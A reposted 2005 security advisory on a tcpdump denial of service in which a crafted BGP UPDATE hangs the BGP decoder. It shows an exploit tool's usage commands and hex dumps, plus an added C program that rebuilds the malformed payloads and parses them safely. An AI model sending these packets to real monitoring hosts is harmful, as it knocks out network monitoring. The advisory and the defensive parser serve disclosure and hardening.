
Thursday, June 09, 2005

[EXPL] Tcpdump Remote Denial of Service Exploit (bgp_update_print)

The following security advisory was sent to the SecuriTeam mailing list and can be found at the SecuriTeam web site: http://www.securiteam.com

Tcpdump Remote Denial of Service Exploit (bgp_update_print)
------------------------------------------------------------------------

SUMMARY

"tcpdump (http://www.tcpdump.org/) is a program used to dump network
traffic for TCP/IP networks. The information can be used by a wide variety
of network analysis programs, either via piping or by saving the stream to
a file for later analysis."

By sending a specially crafted BGP4 UPDATE message across a segment on
which tcpdump is decoding traffic, it is possible to lock the capturing
process in an infinite loop inside its BGP printer (bgp_update_print), a
denial of service against the monitoring host. The packet only has to be
seen by tcpdump: no BGP speaker needs to accept it, and the TCP segment need
not belong to an established session (the exploit below sends a bare SYN to
port 179 carrying the UPDATE as payload).

DETAILS

Vulnerable Systems:
* tcpdump (BGP decoder, bgp_update_print); the advisory does not list
affected versions.

Exploit requirements:
* libnet version 1.1 (the packet-shaping library the exploit is built
against; it is not itself the vulnerable component).

Exploit:
/*
* 2005-05-31: Modified by simon@FreeBSD.org to test tcpdump infinite
* loop vulnerability.
*
* libnet 1.1
* Build a BGP4 update message with what you want as payload
*
* Copyright (c) 2003 Frédéric Raynal <pappy at security-labs organization>
* All rights reserved.
*
* Examples:
*
* empty BGP UPDATE message:
*
* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2
* libnet 1.1 packet shaping: BGP4 update + payload[raw]
* Wrote 63 byte TCP packet; check the wire.
*
* 13:44:29.216135 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]
* 16843009:16843032(23) win 32767: BGP (ttl 64, id 242, len 63)
* 0x0000 4500 003f 00f2 0000 4006 73c2 0101 0101 E..?....@.s.....
* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........
* 0x0020 5002 7fff b288 0000 0101 0101 0101 0101 P...............
* 0x0030 0101 0101 0101 0101 0017 0200 0000 00 ...............
*
*
* BGP UPDATE with Path Attributes and Unfeasible Routes Length
*
* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2 -a `printf "\x01\x02\x03"` -A 3 -W 13
* libnet 1.1 packet shaping: BGP4 update + payload[raw]
* Wrote 79 byte TCP packet; check the wire.
*
* 13:45:59.579901 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]
* 16843009:16843048(39) win 32767: BGP (ttl 64, id 242, len 79)
* 0x0000 4500 004f 00f2 0000 4006 73b2 0101 0101 E..O....@.s.....
* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........
* 0x0020 5002 7fff 199b 0000 0101 0101 0101 0101 P...............
* 0x0030 0101 0101 0101 0101 0027 0200 0d41 4141 .........'...AAA
* 0x0040 4141 4141 4141 4141 4141 0003 0102 03 AAAAAAAAAA.....
*
*
* BGP UPDATE with Reachability Information
*
* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2 -I 7
* libnet 1.1 packet shaping: BGP4 update + payload[raw]
* Wrote 70 byte TCP packet; check the wire.
*
* 13:49:02.829225 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]
* 16843009:16843039(30) win 32767: BGP (ttl 64, id 242, len 70)
* 0x0000 4500 0046 00f2 0000 4006 73bb 0101 0101 E..F....@.s.....
* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........
* 0x0020 5002 7fff e86d 0000 0101 0101 0101 0101 P....m..........
* 0x0030 0101 0101 0101 0101 001e 0200 0000 0043 ...............C
* 0x0040 4343 4343 4343 CCCCCC
*
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
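The three hex dumps in the header above pin down the UPDATE layout the tool
emits: a 16-byte marker, a two-byte total length, type 2, a two-byte
Unfeasible Routes Length followed by the withdrawn prefixes, a two-byte Total
Path Attribute Length followed by the attributes, and the NLRI filling the
remainder. The C program below is an added example; it is not code from the
advisory, from tcpdump or from libnet. It rebuilds those three payloads byte
for byte (23, 39 and 30 octets, as the dumps show), adds one well-formed
UPDATE and one truncated UPDATE constructed for the example, and parses each
with a prefix walker that refuses to move on an illegal prefix length or a
short prefix. Both the -W 13 withdrawn octets (0x41, 'A') and the -I 7 NLRI
octets (0x43, 'C') are read as prefix lengths greater than 32; whether a
decoder reports that, and whether its caller keeps subtracting the result
from the remaining length, is what separates a clean error from a loop that
never ends. The advisory gives no detail on tcpdump's defective code path,
so the guard here illustrates the class of check, not tcpdump's patch. The
function names, the return codes (-1 illegal prefix, -2 truncated) and the
two extra messages are this example's own.

```c
/* Rebuild the UPDATE payloads from the advisory's hex dumps and parse them with
 * loops that cannot run away. Added example; not tcpdump's or libnet's code. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BGP_HDR_LEN 19  /* 16-byte marker, 2-byte length, 1-byte type */
#define BGP_UPDATE  2

struct update_summary { int withdrawn; int nlri; size_t attr_len; };

/* marker | length | type | withdrawn-len | withdrawn | attr-len | attrs | NLRI.
 * Returns octets written, 0 if it would not fit. The marker octet is a parameter
 * because the advisory's tool wrote 0x01 markers (RFC 4271 mandates 0xff). */
size_t build_bgp_update(uint8_t *out, size_t cap, uint8_t marker,
                        const uint8_t *withdrawn, uint16_t wlen,
                        const uint8_t *attrs, uint16_t alen,
                        const uint8_t *nlri, uint16_t nlen) {
    size_t total = BGP_HDR_LEN + 2 + wlen + 2 + alen + nlen, off = BGP_HDR_LEN;
    if (total > cap || total > 4096) return 0;         /* RFC 4271 maximum size */
    memset(out, marker, 16);
    out[16] = (uint8_t)(total >> 8); out[17] = (uint8_t)total; out[18] = BGP_UPDATE;
    out[off++] = (uint8_t)(wlen >> 8); out[off++] = (uint8_t)wlen;
    if (wlen) { memcpy(out + off, withdrawn, wlen); off += wlen; }
    out[off++] = (uint8_t)(alen >> 8); out[off++] = (uint8_t)alen;
    if (alen) { memcpy(out + off, attrs, alen); off += alen; }
    if (nlen) memcpy(out + off, nlri, nlen);
    return total;
}

/* One IPv4 prefix: a length octet, then ceil(plen/8) address octets. Returns octets
 * consumed, -1 for an illegal length (> 32), -2 if the prefix runs past the buffer. */
int decode_ipv4_prefix(const uint8_t *p, size_t avail) {
    if (avail < 1) return -2;
    if (p[0] > 32) return -1;
    size_t need = 1 + (p[0] + 7) / 8;
    return avail < need ? -2 : (int)need;
}

/* Walk a run of prefixes. The advance is checked before it is subtracted: folding an
 * error code into the remaining length leaves "while (len)" with no way to reach zero. */
int walk_prefixes(const uint8_t *p, size_t len) {
    int count = 0;
    while (len) {
        int adv = decode_ipv4_prefix(p, len);
        if (adv <= 0) return adv;                      /* error code, not an advance */
        p += adv; len -= (size_t)adv; count++;
    }
    return count;
}

/* Parse one UPDATE: 0 on success, -1 illegal prefix, -2 truncated or inconsistent
 * lengths. Path attributes are skipped as an opaque blob. */
int parse_bgp_update(const uint8_t *msg, size_t len, struct update_summary *s) {
    if (len < BGP_HDR_LEN + 4) return -2;
    if (((size_t)msg[16] << 8 | msg[17]) != len || msg[18] != BGP_UPDATE) return -2;
    size_t off = BGP_HDR_LEN + 2, wlen = (size_t)msg[19] << 8 | msg[20];
    if (wlen > len - off - 2) return -2;               /* keep room for attr-len */
    int r = walk_prefixes(msg + off, wlen);
    if (r < 0) return r;
    s->withdrawn = r; off += wlen;
    s->attr_len = (size_t)msg[off] << 8 | msg[off + 1]; off += 2;
    if (s->attr_len > len - off) return -2;
    off += s->attr_len;
    r = walk_prefixes(msg + off, len - off);
    if (r < 0) return r;
    s->nlri = r;
    return 0;
}

/* 1-3 rebuild the advisory's dumps (-W 13: 13 x 'A' withdrawn octets plus attrs
 * 01 02 03; -I 7: 7 x 'C' NLRI octets). 4 and 5 are constructed here: two valid
 * prefixes, and a /24 cut short by the end of the message. */
size_t build_example(int which, uint8_t *out, size_t cap) {
    static const uint8_t a13[13] = "AAAAAAAAAAAAA";  /* 0x41 reads as prefix length 65 */
    static const uint8_t c7[7]   = "CCCCCCC";        /* 0x43 reads as prefix length 67 */
    static const uint8_t attr[]  = { 0x01, 0x02, 0x03 };
    static const uint8_t good[]  = { 24, 10, 0, 0, 8, 192 };  /* 10.0.0.0/24, 192.0.0.0/8 */
    static const uint8_t cut[]   = { 24, 10, 0 };
    switch (which) {
    case 1: return build_bgp_update(out, cap, 0x01, NULL, 0, NULL, 0, NULL, 0);
    case 2: return build_bgp_update(out, cap, 0x01, a13, 13, attr, 3, NULL, 0);
    case 3: return build_bgp_update(out, cap, 0x01, NULL, 0, NULL, 0, c7, 7);
    case 4: return build_bgp_update(out, cap, 0xff, NULL, 0, NULL, 0, good, 6);
    case 5: return build_bgp_update(out, cap, 0xff, NULL, 0, NULL, 0, cut, 3);
    default: return 0;
    }
}

int main(void) {
    uint8_t msg[64];
    for (int i = 1; i <= 5; i++) {
        struct update_summary s = { 0, 0, 0 };
        size_t n = build_example(i, msg, sizeof msg);
        int r = parse_bgp_update(msg, n, &s);
        printf("example %d: %zu octets, parse=%d withdrawn=%d nlri=%d\n", i, n, r, s.withdrawn, s.nlri);
    }
    return 0;
}
```

Build with cc -std=c99 -Wall bgp_update_demo.c and run it: examples 2 and 3
stop with -1 at the first withdrawn or NLRI octet instead of looping, example
4 counts two prefixes, and example 5 returns -2 for the cut-off /24.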

/* #if (HAVE_CONFIG_H) */
/* #include "../include/config.h" */
/*